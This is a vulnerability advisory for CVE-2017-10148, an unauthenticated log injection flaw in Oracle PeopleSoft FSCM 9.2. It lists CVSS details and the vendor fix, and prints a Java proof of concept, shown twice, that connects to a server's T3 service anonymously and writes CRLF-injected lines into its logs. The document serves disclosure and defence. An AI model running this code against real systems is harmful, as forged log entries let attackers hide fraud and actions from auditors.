Application: Oracle PeopleSoft **Versions Affected:**PeopleSoft FSCM 9.2 Vendor:Oracle **Bug:**Anonymous log injection **Reported:**16.03.2017 **Vendor response:**17.03.2017 **Date of Public Advisory:**18.07.2017 **Reference: **Oracle CPU July 2017 Authors: Vahagn Vardanyan (ERPScan)
Class: Log injection
Risk: High
Impact: Fraud log events, hiding actions on the system
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-10148
CVSS Base Score v3: 5.8 / 10
CVSS Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Changed © |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | Low (L) |
A: Impact to Availability | None (N) |
An attacker can use a special T3 request to inject special data to log files.
PeopleSoft FSCM 9.2
To correct this vulnerability, implement Oracle CPU July 2017.
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException { Properties p = new Properties(); p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”); p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT); Context ctx = new InitialContext(p); Object obj = ctx.lookup(“weblogic.common.T3Services”); Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class); T3ServicesDef h = (T3ServicesDef) o; h.log().log(“ERPScan_1\n\rERPScan_2”); h.log().info(“ERPScan_3\n\rERPScan_4”); h.log().error(“ERPScan_5\n\rERPScan_6”); h.log().warning(“ERPScan_7\n\rERPScan_8”); h.log().debug(“ERPScan_9\n\rERPScan_10”); return false; }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
static boolean anon_log_injection(String PS_SERVER_IP,String PS_SERVER_PORT) throws NamingException, JMSException, RemoteException, T3Exception, ServerMigrationException, PersistentStoreException {
Properties p = new Properties();
p.put(Context.INITIAL_CONTEXT_FACTORY, “weblogic.jndi.WLInitialContextFactory”);
p.put(Context.PROVIDER_URL, “t3://“PS_SERVER_IP+”:”+PS_SERVER_PORT);
Context ctx = new InitialContext(p);
Object obj = ctx.lookup(“weblogic.common.T3Services”);
Object o = PortableRemoteObject.narrow(obj, T3ServicesDef.class);
T3ServicesDef h = (T3ServicesDef) o;
h.log().log(“ERPScan_1\n\rERPScan_2”);
h.log().info(“ERPScan_3\n\rERPScan_4”);
h.log().error(“ERPScan_5\n\rERPScan_6”);
h.log().warning(“ERPScan_7\n\rERPScan_8”);
h.log().debug(“ERPScan_9\n\rERPScan_10”);
return false;
}
—|—